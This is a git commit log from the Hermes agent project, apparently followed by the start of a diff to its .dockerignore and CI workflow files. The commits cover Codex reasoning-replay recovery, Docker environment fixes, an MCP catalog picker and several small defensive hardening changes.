session previously got stuck retrying the same poisoned payload.

Recovery: classify the error as a dedicated FailoverReason, and on the
first hit disable encrypted reasoning replay for the rest of the
session, strip cached items from message history, and retry once.

Changes:
* error_classifier: add FailoverReason.invalid_encrypted_content
  branch in _classify_400 (before context_overflow so the messages
  that mention 'encrypted content … could not be verified' don't trip
  context heuristics), in _classify_by_error_code, and extend
  _extract_error_code to peek inside wrapped JSON in error.message and
  ignore the bare '400' as a code.
* agent_init: initialize `_codex_reasoning_replay_enabled = True` on
  every agent.
* run_agent: add AIAgent._disable_codex_reasoning_replay() helper
  that flips the flag and pops cached items.
* codex_responses_adapter: thread a `replay_encrypted_reasoning`
  kwarg through _chat_messages_to_responses_input so that when the
  flag is False we don't replay codex_reasoning_items.
* transports/codex.py: read `replay_encrypted_reasoning` from params,
  thread it into the adapter, and gate the
  `include=['reasoning.encrypted_content']` request hint on it.
* chat_completion_helpers: pass the agent's replay flag through to
  the transport.
* conversation_loop: in the retry loop, add an
  invalid_encrypted_content recovery branch that fires once per
  session, only when api_mode == codex_responses, only when replay is
  still enabled, and only when at least one assistant message in
  history actually carries cached reasoning items (otherwise the 400
  has nothing to do with our cache and the normal retry path handles
  it).

Tests:
* test_error_classifier: new wrapped-JSON _extract_error_code case;
  new TestClassifyApiError cases proving the 400 is retryable with
  no fallback, that the broad message match doesn't catch a generic
  'parsed' message, and that the error code match is
  case-insensitive.
* test_run_agent_codex_responses: end-to-end test of the recovery
  branch firing once and disabling replay, plus a sibling test that
  proves the branch does *not* fire (and the flag stays True) when
  history has no cached reasoning items.

Salvages PR #10144 onto the post-refactor module layout
(error_classifier / codex_responses_adapter / transports/codex /
conversation_loop / agent_init) since the original diff was written
against the pre-refactor monolithic run_agent.py.

* chore(release): map victorGPT in AUTHOR_MAP for #10144 salvage

---------

Co-authored-by: victorGPT <wuxuebin1993@gmail.com>
2026-05-26 22:01:17 -07:00
Jeffrey Quesnelle 9d3e9316f4 Merge pull request #29591 from NousResearch/jq/hermes-update-branch-flag
feat(cli): add --branch flag to `hermes update`
2026-05-27 00:57:37 -04:00
emozilla 3d9a26afad Merge remote-tracking branch 'origin/main' into jq/hermes-update-branch-flag 2026-05-27 00:48:25 -04:00
Ben 1e5884e38f refactor(docker): drop build-essential from apt install (#27507)
build-essential is a Debian metapackage (libc6-dev + gcc + g++ + make + dpkg-dev).
The Dockerfile already installs gcc + python3-dev + libffi-dev explicitly,
which covers the C-ext compile cases lazy_deps may hit at first boot.
g++/make/dpkg-dev aren't reached by the resolved [all]+[messaging] tree
on current main — verified via uv sync --dry-run on cp313-linux.

Co-authored-by: Monty Taylor <mordred@inaugust.com>
2026-05-27 14:35:19 +10:00
Ben Barclay 81a4f280d2 Merge pull request #22534 from wesleysimplicio/fix/voice-mode-docker-respect-pulse-pipewire
fix(voice): honor PULSE_SERVER/PIPEWIRE_REMOTE inside Docker (#21203)
2026-05-27 13:59:12 +10:00
teknium1 9feadc2734 chore(release): map ticketclosed-wontfix noreply to GitHub login 2026-05-26 20:51:59 -07:00
Nick 0a83247e9f feat: add TUI session orchestrator
Add a first-class active-session orchestrator for the Ink TUI:

- list, activate, close, and launch live process-local TUI sessions
- hydrate committed and in-flight output when switching sessions
- dispatch a new prompt session from the +new row with session-scoped model picks
- expose a clickable live-session count in the status chrome
- preserve stable row order while initially focusing the current session
- support mouse hit-testing for floating orchestrator overlays
- add backend and frontend regression coverage for the lifecycle and UI helpers
2026-05-26 20:51:59 -07:00
beardthelion 2fc77c53f0 feat(opencode-go): route qwen3.7-max via anthropic_messages
qwen3.7-max on OpenCode Go rejects the OpenAI-compatible (oa-compat)
format with HTTP 401 but works correctly via the Anthropic Messages
endpoint (/v1/messages with x-api-key auth).  Route it the same way
MiniMax models are routed: anthropic_messages api_mode.

Changes:
- hermes_cli/models.py: add qwen3.7-max routing + curated list
- hermes_cli/setup.py: add to setup wizard model list
- hermes_cli/auth.py: update provider comment
- tests: add assertions for qwen3.7-max api_mode routing
2026-05-26 20:44:43 -07:00
Ben Barclay 3c7f786ade Merge pull request #31557 from yu-xin-c/codex/docs-xurl-docker-home-29108
docs: clarify xurl auth HOME in Docker
2026-05-27 13:42:51 +10:00
Ben Barclay 7d94eee0a9 Merge pull request #32122 from yu-xin-c/codex/docs-docker-audio-bridge-32009
docs: add Docker audio bridge notes
2026-05-27 13:42:36 +10:00
Ben Barclay 628aaea63a Merge pull request #32412 from jonpol01/fix/docker-env-propagation
fix(docker): propagate env through s6 to cont-init and main CMD
2026-05-27 13:42:26 +10:00
Ben Barclay 840f79ed12 Merge pull request #31031 from Sunil123135/feat/windows-docker-desktop
feat(docker): add Windows Docker Desktop compatible compose file
2026-05-27 13:41:16 +10:00
Will Falcon bba50977bc fix: parse Codex image generation SSE directly 2026-05-26 20:40:29 -07:00
Teknium 16e86ce6a7 chore(release): map wangpuv contributor email for #32933 (#33005)
Pre-stages the AUTHOR_MAP entry so the contributor-check workflow
passes when Will Falcon's image-gen SSE fix lands.
2026-05-26 20:40:17 -07:00
Ben Barclay 1e267c4859 Merge pull request #29025 from slowtokki0409/codex/ignore-local-runtime-files
Ignore local Hermes runtime files
2026-05-27 13:20:01 +10:00
Teknium 2a8d217417 chore(release): map carltonawong noreply to GitHub login
Added AUTHOR_MAP entry for the cherry-picked fix in the preceding
commit so the release contributor audit can resolve Carlton's noreply
email.
2026-05-26 19:37:37 -07:00
Carlton 43a3f119fc fix(agent): recover Codex streams with null output 2026-05-26 19:37:37 -07:00
Teknium bb4703c761 docs(auth): replace stale 'hermes login' references with 'hermes auth add'
'hermes login' was removed (the command now just prints a deprecation
message and exits). The bundled hermes-agent SKILL.md, in-code error
messages, the tip rotation, the proxy adapters, and the docs site
still pointed agents and users at the dead command — so models loading
the skill kept running 'hermes login --provider openai-codex' and
getting a dead-end print.

Replacements use the canonical 'hermes auth add <provider>' surface
(or bare 'hermes auth' for the interactive manager).

Files:
- skills/autonomous-ai-agents/hermes-agent/SKILL.md (+ regenerated docs page)
- hermes_cli/tips.py (tip rotation)
- agent/google_oauth.py (gemini-cli error message)
- agent/conversation_loop.py (nous re-auth troubleshooting line)
- agent/credential_sources.py (docstring)
- hermes_cli/proxy/cli.py + hermes_cli/proxy/adapters/nous_portal.py (proxy auth hints)
- tests/hermes_cli/test_proxy.py (updated assertions)
- website/docs/reference/faq.md, website/docs/user-guide/features/subscription-proxy.md
- zh-Hans i18n mirrors for the above

'hermes logout' is still a live command and is left untouched.
The 'hermes login' stub in hermes_cli/auth.py:login_command() and
the cli-commands.md 'Deprecated' rows are intentionally kept as
the discoverable deprecation surface.
2026-05-26 15:41:11 -07:00
teknium1 f05a47309e fix(gateway): refresh cached agent tools on /reload-mcp
When the gateway processes /reload-mcp, it reconnects MCP servers and
updates the global _servers registry, but cached AIAgent instances in
_agent_cache keep the tools list they were built with. The user had to
also run /new (discarding conversation history) before the agent could
see the new tools — even though /reload-mcp had succeeded.

This patch refreshes each cached agent's .tools and .valid_tool_names
in _execute_mcp_reload after discovery returns, so existing sessions
pick up new MCP tools on their next turn. The slash-confirm gate in
_handle_reload_mcp_command already obtains user consent for the
implied prompt-cache invalidation before this code runs.

Mirrors the equivalent behaviour the CLI already does in cli.py
_reload_mcp. Per-agent enabled_toolsets and disabled_toolsets are
preserved so an agent that was scoped to a subset of toolsets does
not silently gain disabled tools after the reload.

Original diagnosis + initial implementation in #23812 from @fujinice.
The auto-reload watcher half of that PR is intentionally dropped —
users want /reload-mcp to remain explicit.

Co-authored-by: fujinice <45688690+fujinice@users.noreply.github.com>
2026-05-26 14:28:51 -07:00
teknium1 556bf7c5c1 test(cron): guard schedule-required description text on CRONJOB_SCHEMA 2026-05-26 14:09:37 -07:00
ygd58 51013268cf fix(cron): clarify schedule is required for create in tool schema
Grok models (and other LLMs) sometimes omit the schedule parameter
when calling the cronjob tool with action=create because the schema
only listed 'action' in required[] and the schedule description did
not explicitly state it was mandatory (issue #32427).

Fix: update schema descriptions to clearly state schedule is REQUIRED
for action=create, making this explicit for models that rely on
description text for parameter compliance.

Fixes #32427
2026-05-26 14:09:37 -07:00
Teknium ccd3d04fc5 chore(models): swap qwen3.6-plus → qwen3.7-max in openrouter+nous lists (#32809)
Updates curated picker lists for both the OpenRouter fallback snapshot
(`OPENROUTER_MODELS`) and the Nous Portal list (`_PROVIDER_MODELS['nous']`).
Regenerates website/static/api/model-catalog.json via
`scripts/build_model_catalog.py` to keep the docs-hosted manifest in
sync (drift guard in `test_in_repo_lists_match_manifest`).

tests/hermes_cli/test_models.py fixtures updated — they pinned the
old model id as their live-fetch sample.
2026-05-26 14:01:47 -07:00
Teknium 8b69ec03af feat(mcp): Nous-approved MCP catalog with interactive picker (#30870)
* feat(mcp): Nous-approved MCP catalog with interactive picker

Adds an optional-mcps/ directory mirroring optional-skills/: curated,
Nous-approved MCP servers shipped with the repo but disabled by default.
Presence in optional-mcps/ = approval. No community tier, no trust signals.
Entries are added by merging a PR.

New surface:
  hermes mcp                       Interactive catalog picker (default)
  hermes mcp catalog               Plain-text list, scriptable
  hermes mcp install <name>        Install a catalog entry

Picker behavior:
  not installed   -> install (clone/bootstrap if needed, prompt for creds)
  installed/off   -> enable
  installed/on    -> menu (disable / uninstall / reinstall)

Manifest schema (manifest_version: 1) supports:
- transport: stdio (command/args, ${INSTALL_DIR} substitution) or http (url)
- install: optional git clone + bootstrap commands (for repos that need
  local venv setup, like the n8n bridge); omit for npx/uvx servers
- auth: api_key (prompts -> ~/.hermes/.env), oauth (provider-mediated
  or native MCP), or none

Catalog entries are never auto-updated. Users re-run `hermes mcp install`
to refresh. Credentials always go to ~/.hermes/.env (the .env-is-for-secrets
rule), never to per-server env blocks.

Ships n8n as the reference manifest (https://github.com/CyberSamuraiX/hermes-n8n-mcp).

Tests: 19 catalog tests + E2E install/uninstall round-trip via the shipped
manifest.

* feat(mcp): tool-selection checklist + Linear catalog entry

Adds install-time tool selection so users only enable the MCP tools they
actually want, and ships Linear as a second reference catalog entry to
demonstrate the http+oauth path alongside n8n's stdio+api_key+git-bootstrap.

Tool selection flow:
  install (clone/auth/credentials) ->
  probe server for available tools ->
  curses checklist with pre-checked rows ->
  write mcp_servers.<name>.tools.include

Pre-check priority:
  1. user's prior tools.include  (reinstall preserves selection)
  2. manifest's tools.default_enabled  (curated subset)
  3. all probed tools  (default)

Probe-failure fallback (server unreachable, OAuth not yet complete,
backing service offline):
  - manifest declared default_enabled -> applied directly
  - no default declared -> no filter written (all-on when reachable)
  - both cases point user at hermes mcp configure <name>

Manifest schema additions:
  tools:
    default_enabled: [list, of, tool, names]   # optional

Updates:
  - optional-mcps/linear/manifest.yaml -- new reference entry (http+oauth)
  - optional-mcps/n8n/manifest.yaml -- tools.default_enabled set to the
    8 read-mostly tools; mutating tools (activate/deactivate, container_logs)
    pruned by default
  - docs: new 'Tool selection at install time' section in features/mcp.md

Tests: 7 new tests in TestToolSelection covering probe-success / probe-fail
matrix, manifest-default filtering, reinstall-preserves-selection, and
invalid-default-enabled rejection. 26 catalog tests + 32 existing
mcp_config tests passing.

* feat(mcp): polish — picker unification, include-mode convergence, hardening

Addresses review findings on PR #30870. Lands all improvements that
belong in this PR before merge; defers separate cleanup (consolidating
two probe implementations, change-detector tests) to follow-ups.

Picker UX (mcp_picker.py)
- Unifies catalog + custom (user-added) MCPs in one view with distinct
  status badges (available / enabled / installed (disabled) /
  custom — enabled / custom — disabled)
- Adds 'Configure tools (probe server + re-pick)' action to both the
  catalog-installed and custom-row submenus — the existing
  hermes mcp configure flow was previously unreachable from the picker
- Loops until ESC/q so the user can manage several entries in one
  session instead of having to re-launch
- Uninstall message now mentions .env credentials are preserved with a
  pointer to clean them up manually if no longer needed
- Surfaces a 'requires a newer Hermes' warning per future-manifest
  entry instead of silently hiding it

Catalog (mcp_catalog.py)
- catalog_diagnostics() exposes which manifests were skipped and why
  (future_manifest vs invalid) so UIs can give actionable feedback
- _do_git_install detects SHA-shaped refs (regex /[0-9a-f]{7,40}/)
  and skips the doomed 'git clone --branch <sha>' attempt — clone --branch
  only accepts branches/tags, so SHAs always failed noisily before
  falling back to the full-clone path
- Probe-success all-tools-enabled message now mentions that new tools
  the server adds later will be auto-enabled (no-filter mode)

Convergence (tools_config.py)
- _configure_mcp_tools_interactive now writes tools.include (whitelist)
  instead of tools.exclude (blacklist), matching the catalog flow and
  hermes mcp configure. The on-disk config shape no longer depends on
  which UI the user touched last
- Two existing tests updated to assert the new include-mode contract

Discoverability
- Setup wizard final step now prints 'Browse curated MCPs: hermes mcp'
- Three tip-corpus entries pointing at the new catalog
- Docs updated with: trust model (manifests run code locally, gated by
  PR review, but read before installing), runtime ${ENV_VAR} substitution
  semantics, and the manifest_version forward-compat behavior

Tests
- 7 new tests covering future-manifest diagnostics, custom MCP picker
  rows, SHA-ref git-install path, branch-ref git-install path, and the
  tools_config include-mode write contract
- 80 MCP-related tests passing across test_mcp_catalog.py,
  test_mcp_config.py, test_mcp_tools_config.py

* fix(mcp): drop setup-wizard catalog hint to satisfy supply-chain scanner

The wizard line 'Browse curated MCPs: hermes mcp' triggered the
CI supply-chain scanner because it pattern-matches on edits to any
file named hermes_cli/setup.py — that filename matches the Python
'install-hook file' heuristic even though this setup.py is the
user-facing 'hermes setup' wizard, not a packaging install hook.

The catalog is already surfaced via three tip-corpus entries in
hermes_cli/tips.py (which the scanner doesn't flag), so dropping the
wizard mention loses no discoverability. Worth revisiting after a
scanner allowlist for this specific file lands.
2026-05-26 12:48:14 -07:00
Teknium 2517917de3 fix(cli): restore fallback paste collapse + handle long single-line pastes (#32447)
Follow-up to #32087 after community report from @ethernet that 8000-char
single-line pastes get dumped raw into the input box.

A) Fallback regression revert
   paste_collapse_threshold_fallback default: 0 -> 5
   #32087 disabled the fallback handler by default. The fallback path
   has been always-on with line_count >= 5 since #3065 (March 2026);
   the previous shape was the salvaged contributor's design and didn't
   match pre-existing behavior for terminals without bracketed paste
   support (Windows terminals, some SSH setups). Restoring the original
   on-by-default.

B) Long single-line paste guard
   New config key: paste_collapse_char_threshold (default 2000)
   Bracketed-paste handler and fallback handler now BOTH collapse when
   line count >= line threshold OR total char length >= char threshold.
   Catches the case ethernet hit: ~8000 chars of minified JSON / log
   output on a single line dumped raw into the buffer.
   TUI mirrors the same config via uiStore.pasteCollapseChars.
   Set 0 to disable.

Defaults verified:
  paste_collapse_threshold: 5
  paste_collapse_threshold_fallback: 5
  paste_collapse_char_threshold: 2000

Tests:
  tests/hermes_cli/test_config.py: 87/87 pass
  ui-tui useConfigSync.test.ts: 34/34 pass
  ui-tui useComposerState.test.ts: 9/9 pass
  tsc: 0 new errors in touched files
2026-05-25 23:49:01 -07:00
Teknium 31c8d5ff5f chore(wecom): make defusedxml dep acquireable and tolerant of absence
Follow-up on top of @TheOnlyMika's #32155 cherry-pick. The defusedxml
hardening import was unconditional, which would break the gateway for
anyone running a WeComCallback adapter without the (transitive-only)
defusedxml present.

- Wrap the import in the same try/except pattern as aiohttp/httpx in
  the same file. Sets DEFUSEDXML_AVAILABLE flag.
- Extend check_wecom_callback_requirements() to gate on the flag, so
  the gateway logs the actual missing dep and skips the adapter
  instead of crashing.
- Add [wecom] extra to pyproject.toml with defusedxml==0.7.1.
- Register platform.wecom_callback in tools/lazy_deps.py so users get
  prompted to install it on first WeComCallback configuration, same
  pattern as discord/slack/matrix.

defusedxml is still the right call for pre-auth XML parsing — this
commit just makes the dep declarative and recoverable instead of a
hard import-time crash.
2026-05-25 23:30:43 -07:00
TheOnlyMika 5744b17579 harden: restrict markdown link schemes; parse untrusted XML with defusedxml
Two small defensive-hardening changes:

- web/src/components/Markdown.tsx: render links only for http(s)/mailto
  schemes; other schemes (javascript:, data:, vbscript:) are dropped to
  plain text so a crafted link in rendered content can't execute on click.

- gateway/platforms/wecom_callback.py: parse the untrusted, pre-auth WeCom
  callback request body with defusedxml instead of xml.etree, blocking
  entity-expansion / billion-laughs (and XXE) on the parse path. defusedxml
  is already a dependency (uv.lock); response-building XML in
  wecom_crypto.py is unchanged (it is not parsed from untrusted input).

Verified: dashboard typechecks and builds; defusedxml blocks an
entity-expansion payload while valid WeCom envelopes still parse.
2026-05-25 23:30:43 -07:00
dearmayo f4953bc648 fix(subdirectory_hints): prevent loading AGENTS.md outside workspace
SubdirectoryHintTracker was scanning directories outside the active
working directory, allowing files like ~/.codex/AGENTS.md or
~/.claude/CLAUDE.md to be loaded and injected into the agent context.
This causes cross-agent context contamination and instruction mixup.

Add _is_ancestor_or_same() helper and a path boundary check in
_is_valid_subdir(): only directories within the working directory tree
(i.e. path.is_relative_to(working_dir)) are allowed.

Also add exist_ok=True to mkdir() calls in new tests to prevent
pytest-xdist race conditions when workers share the same tmp_path parent.

Tests added:
- test_outside_working_dir_rejected: verifies sibling dirs are blocked
- test_outside_working_dir_absolute_path_rejected: verifies ~/.codex paths blocked
- test_inside_workspace_subdir_allowed: verifies normal subdir access unaffected
- test_sibling_repo_not_loaded_via_ancestor_walk: ancestor walk stays within workspace
2026-05-25 23:17:33 -07:00
Krisli Dimo 9d10c45e32 fix(telegram): tighten table row-group spacing and drop redundant first bullet
The GFM → Telegram-row-group rewriter previously joined every line in
every row with a blank line ("\n\n".join(rendered_rows)), which made
multi-column tables explode into one-bullet-per-paragraph walls on
mobile.  It also emitted the row heading twice when the table had no
row-label column: once as the standalone bold heading and once again
as the first labeled bullet (heading == headers[0] == data_cells[0]).

This commit:

* Uses single newlines between the heading and its bullets within a
  row-group, and a blank line only BETWEEN row-groups.
* Skips any bullet whose value duplicates the heading text when the
  table has no row-label column (the heading already carries that
  information).  Tables WITH a row-label column are unaffected since
  the heading comes from the label cell and never duplicates a header.

Updated existing test assertions accordingly and added two regression
tests: one that reproduces the screenshot bug (wide five-column "Plays"
comparison table) and one that pins the row-label-column behavior so
the dedup logic doesn't accidentally swallow real data.

tests/gateway/test_telegram_format.py: 101 passed
2026-05-25 23:16:00 -07:00
kshitij 66851dc413 chore: add krislidimo to AUTHOR_MAP for PR #29775 (#32434) 2026-05-25 23:15:56 -07:00
Teknium d8703e27f5 feat(skills-hub): health checks, freshness badge, and a watchdog cron (#32345)
Layered safety so the Skills Hub at /docs/skills stays in sync without
silent rot. Three pieces:

1. build_skills_index.py — refuses to ship a degenerate index.
   EXPECTED_FLOORS per source (skills.sh ≥100, lobehub ≥100, clawhub ≥50,
   official ≥50, github ≥30, browse-sh ≥50) and MIN_TOTAL=1500. Any source
   collapsing to zero (the silent OpenAI breakage that hid for weeks) now
   fails the workflow loud — broken index never reaches the live site.

2. extract-skills.py + the React page — visible freshness signal.
   Sidecar website/src/data/skills-meta.json carries the index's
   generated_at timestamp, plus per-source counts. Skills Hub renders a
   'Catalog refreshed N hours ago · auto-rebuilt twice daily' line under
   the hero copy. If the cron stalls, users see the staleness immediately.

3. .github/workflows/skills-index-freshness.yml — watchdog cron.
   Every 4 hours, fetches the live /docs/api/skills-index.json, validates
   shape, checks age (>26h is stale), checks the same per-source floors,
   and opens (or appends to) a GitHub issue when anything is off. The
   issue is title-prefixed [skills-index-watchdog] so subsequent failures
   append a comment instead of spamming new issues.

Net effect:
- A silent regression like 'OpenAI tap moved its skills' now fails the
  build instead of shipping a quietly broken catalog.
- A stuck cron (like the landingpage breakage that ran red for weeks) now
  files an issue within 4 hours.
- Users see how fresh the catalog is on the page itself.

Test plan:
- Local: built skills-meta.json from the live index → 'Catalog refreshed
  N minutes ago' rendered correctly in the static HTML.
- Probe logic dry-run against the live index: total=2456, all 6 sources
  above floor, age 0.1h — issues=NONE.
- Triggered skills-index.yml manually; both jobs green, deploy-site.yml
  dispatch fired.
2026-05-25 23:10:45 -07:00
John Paul Soliva 29c71e972a fix(docker): propagate container env through s6 to cont-init and main CMD
s6-overlay's /init scrubs the environment before invoking both
/etc/cont-init.d/* scripts and the container's CMD wrapper. As a
result, ENV directives from the Dockerfile (HERMES_HOME=/opt/data,
HERMES_WEB_DIST, …) and compose-time `environment:` entries
(HERMES_UID, HERMES_GID) never reached the scripts that actually
use them. Three concrete failures observed on macOS Docker Desktop
with `~/.hermes:/opt/data`:

* stage2-hook.sh ran with HERMES_UID unset → no UID remap, hermes
  user stayed at UID 10000 instead of the host user's UID.
* skills_sync.py (invoked from stage2-hook) ran with HERMES_HOME
  unset → get_hermes_home() fell back to Path.home()/.hermes,
  populating a shadow $HERMES_HOME/.hermes/skills tree on the
  mounted volume (visible on the host as ~/.hermes/.hermes/skills).
* The main `hermes gateway run` process inherited HOME=/root from
  the /init context (s6-setuidgid doesn't update HOME), so
  libraries resolving XDG_STATE_HOME via $HOME tried to write to
  /root/.local/state/hermes/gateway-locks/ and failed with EACCES,
  preventing the Discord adapter from acquiring its bot-token lock.

Three surgical changes restore correct env flow:

1. The auto-generated /etc/cont-init.d/01-hermes-setup wrapper now
   uses `#!/command/with-contenv sh`, matching the pattern already
   used by docker/cont-init.d/02-reconcile-profiles. The container
   env (Dockerfile ENV + compose `environment:`) now reaches
   stage2-hook.sh and the skills_sync.py subprocess it spawns.

2. docker/main-wrapper.sh also switches to `#!/command/with-contenv
   sh`. The container CMD (`gateway run`, `chat`, `setup`, …) now
   sees HERMES_HOME and the other container-level env vars.

3. docker/main-wrapper.sh exports HOME=/opt/data before
   `s6-setuidgid hermes`. with-contenv populates HOME from the
   /init context (/root); s6-setuidgid drops privileges but does
   not update HOME. The hermes user's home per /etc/passwd is
   /opt/data, so the explicit override matches passwd.

No behavior change for the non-buggy paths: the s6-supervised
services already used with-contenv, and HOME=/opt/data only affects
processes that resolved $HOME-based paths to /root (silently
broken).
2026-05-26 13:41:21 +09:00
Stellar鱼 95cee44301 docs: add Docker audio bridge notes 2026-05-25 22:45:12 +08:00
Stellar鱼 1579a6f4a9 docs: clarify xurl auth HOME in Docker 2026-05-24 23:50:31 +08:00
Sunil123135 f8695ed6a7 feat(docker): add Windows Docker Desktop compatible compose file 2026-05-23 21:52:34 +05:30
Austin Pickett c9e5a9bb08 refactor(web): consume DS primitives, remove local component copies
Replace locally-forked UI components and hooks with their newly
promoted counterparts from @nous-research/ui:

Deleted local components (now in DS):
- components/ui/input.tsx, label.tsx, separator.tsx, card.tsx,
  confirm-dialog.tsx
- components/Toast.tsx, BottomPickSheet.tsx, NouiTypography.tsx
- hooks/useToast.ts, useModalBehavior.ts, useBelowBreakpoint.ts,
  useConfirmDelete.ts

Import updates across 25 files to use DS deep imports:
- @nous-research/ui/ui/components/{input,label,separator,card,
  confirm-dialog,toast,bottom-sheet}
- @nous-research/ui/ui/components/typography (replaces NouiTypography)
- @nous-research/ui/hooks/{use-toast,use-modal-behavior,
  use-below-breakpoint,use-confirm-delete}

Requires design-language >= feat/promote-hermes-web-primitives.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-22 21:57:59 -04:00
ilonagaja509-glitch b96a1a042f fix(docker): include anthropic, bedrock, azure-identity extras in image
Docker containers often run in isolated networks without access to PyPI.
The lazy-install mechanism fails silently in these environments, causing
ImportError when users try to use Anthropic, Bedrock, or Azure providers.

Add --extra anthropic, --extra bedrock, and --extra azure-identity to the
Dockerfile's uv sync command so these provider packages are pre-installed
in the published image.

Fixes #30394
2026-05-22 23:58:55 +08:00
emozilla d5b73937db fix(cli): plug silent-divergence holes in --branch flag
Three follow-up fixes — all the same shape: silently doing the wrong
thing instead of either honoring --branch or refusing.

1) --check --branch <missing> raised CalledProcessError from
   'git rev-list ... --count' (check=True) when the branch didn't
   exist on origin. 'git fetch origin' succeeds without a refspec
   (it just fetches what's there), so the bad-branch case wasn't
   caught at the fetch step. Now verify the compare ref with
   'git rev-parse --verify --quiet' before rev-list and emit a
   friendly error.

2) _update_via_zip (Windows fallback for broken git file I/O)
   hard-coded branch = 'main', so on the ZIP path --branch=foo
   silently downloaded main.zip and told the user it worked. Refuse
   in that case instead — silently lying about which branch got
   installed is exactly what --branch was added to prevent.

3) _cmd_update_check PyPI path returned before looking at branch,
   so PyPI users running 'hermes update --check --branch=x' got a
   generic PyPI version check with no indication --branch was
   dropped. Now prints a one-line warning when --branch was explicit
   and non-main.

Also pull the '(getattr(args, branch, None) or main).strip() or main'
expression into _resolve_update_branch(args) — three callsites agree
on the same parsing.

Tests: 5 new tests for the --check + --branch matrix (named branch,
missing branch, default-main upstream-first, PyPI warning) and the
ZIP refusal. test_cmd_update.py is 20/20 green, broader hermes_cli/
suite (4952 tests) unchanged.
2026-05-21 02:14:08 -04:00
emozilla 51689a4206 feat(cli): add --branch flag to hermes update
`hermes update` has always hard-coded its target to `main`. Add --branch
so callers can update against a non-default channel while preserving every
existing behavior at the default:

- `hermes update`           still pulls main (no behavior change)
- `hermes update --branch X` pulls origin/X, auto-stashing and switching
                              local HEAD to X first if needed
- `hermes update --check --branch X` reports behindness against
                              origin/X (and skips the upstream/X probe,
                              since forks don't have upstream copies of
                              their own feature branches)
- Branch absent locally   → retry as `checkout -B X origin/X` (track)
- Branch absent everywhere → exit 1 with a clear error, after restoring
                              the user's prior stash so we don't strand
                              them in a weird state

The fork-upstream sync logic was already guarded on `branch == 'main'`,
so non-main updates correctly skip the upstream trampling without
further changes.

5 new tests cover: explicit --branch, default-to-main, switch-from-other,
track-from-origin, and the fail-cleanly case. Full test_cmd_update.py
suite (15 tests) passes on main.
2026-05-20 22:18:47 -04:00
slowtokki0409 ec641d497a chore: ignore local Hermes runtime files
Keep local Hermes Docker runtime data, NotebookLM auth/cache, and personal compose overrides out of Git and Docker build contexts. This protects tokens, OAuth state, sessions, logs, and caches while preserving the source tree.

Constraint: Only .gitignore and .dockerignore are in scope for this commit.

Tested: git diff --cached --name-only and git diff --cached --stat

Co-authored-by: OmX <omx@oh-my-codex.dev>
2026-05-20 09:57:51 +09:00
Wesley Simplicio 30dd5547ad fix(voice_mode): generalize container phrasing and use $XDG_RUNTIME_DIR 2026-05-09 15:21:12 -03:00
Wesley Simplicio bde487c911 fix(voice): honor PULSE_SERVER/PIPEWIRE_REMOTE inside Docker (#21203)
detect_audio_environment() unconditionally added a hard warning when
running inside a container, blocking /voice on even when the host audio
socket was correctly forwarded (PulseAudio or PipeWire) and sounddevice
could enumerate devices.

Mirror the existing WSL/PulseAudio handling: if PULSE_SERVER or
PIPEWIRE_REMOTE is set, downgrade to a notice and let the audio backend
decide.  When neither is set, keep the block but extend the message with
the exact -v / -e flags users need.

Closes #21203
2026-05-09 08:55:00 -03:00
639 changed files with 46427 additions and 8448 deletions
+6
View File
@@ -8,6 +8,10 @@ node_modules
**/node_modules
.venv
**/.venv
.notebooklm-cli-venv/
.notebooklm-playwright/
.pip-cache/
.uv-cache/
# Built artifacts that are regenerated inside the image. Excluded so local
# rebuilds on the developer's machine don't invalidate the npm-install layer
@@ -25,6 +29,8 @@ ui-tui/packages/hermes-ink/dist/
# Runtime data (bind-mounted at /opt/data; must not leak into build context)
data/
.hermes-docker/
.notebooklm-home/
# Compose/profile runtime state (bind-mounted; avoid ownership/secret issues)
hermes-config/
+7 -2
View File
@@ -22,7 +22,12 @@ concurrency:
jobs:
deploy-vercel:
if: github.event_name == 'release'
# Triggered automatically on release publish (production cuts) and
# manually via `gh workflow run deploy-site.yml` when an out-of-band
# main commit needs to ship live before the next release tag — e.g.
# a skills-index PR that doesn't touch website/** paths and so
# doesn't auto-deploy via the deploy-docs path.
if: github.event_name == 'release' || github.event_name == 'workflow_dispatch'
runs-on: ubuntu-latest
steps:
- name: Trigger Vercel Deploy
@@ -97,4 +102,4 @@ jobs:
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@cd2ce8fcbc39b97be8ca5fce6e763baed58fa128 # v5.0.0
uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4
+48 -234
View File
@@ -28,8 +28,7 @@ permissions:
contents: read
# Concurrency: push/release runs are NEVER cancelled so every merge gets
# its own :main or release-tagged image. :latest is guarded separately
# by the move-latest job. PR runs reuse a PR-scoped group with
# its own image. PR runs reuse a PR-scoped group with
# cancel-in-progress: true so rapid pushes to the same PR collapse to the
# latest commit.
concurrency:
@@ -72,6 +71,8 @@ jobs:
load: true
platforms: linux/amd64
tags: ${{ env.IMAGE_NAME }}:test
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
cache-from: type=gha,scope=docker-amd64
cache-to: type=gha,mode=max,scope=docker-amd64
@@ -140,12 +141,6 @@ jobs:
# Push amd64 by digest only (no tag). The merge job assembles the
# tagged manifest list. `push-by-digest=true` is docker's recommended
# pattern for multi-runner multi-platform builds.
#
# We apply the OCI revision label here (and again on arm64) because
# the move-latest job reads it off the linux/amd64 sub-manifest
# config of the floating tag to decide whether it's safe to advance.
# The label must be on each per-arch image — manifest lists themselves
# don't carry image config labels.
- name: Push amd64 by digest
id: push
if: github.event_name == 'push' && github.ref == 'refs/heads/main' || github.event_name == 'release'
@@ -156,6 +151,8 @@ jobs:
platforms: linux/amd64
labels: |
org.opencontainers.image.revision=${{ github.sha }}
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
outputs: type=image,name=${{ env.IMAGE_NAME }},push-by-digest=true,name-canonical=true,push=true
cache-from: type=gha,scope=docker-amd64
cache-to: type=gha,mode=max,scope=docker-amd64
@@ -199,10 +196,12 @@ jobs:
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
# Build once, load into the local daemon for smoke testing. Cached
# to gha with a per-arch scope; the push step below reuses every
# layer from this build.
- name: Build image (arm64, smoke test)
# Build once, load into the local daemon for smoke testing. PR arm64
# builds deliberately avoid the gha cache: cold-cache arm64 builds can
# outlive GitHub's short-lived Azure cache SAS token, then fail while
# reading or writing cache blobs before the smoke test can run.
- name: Build image (arm64, smoke test, uncached PR)
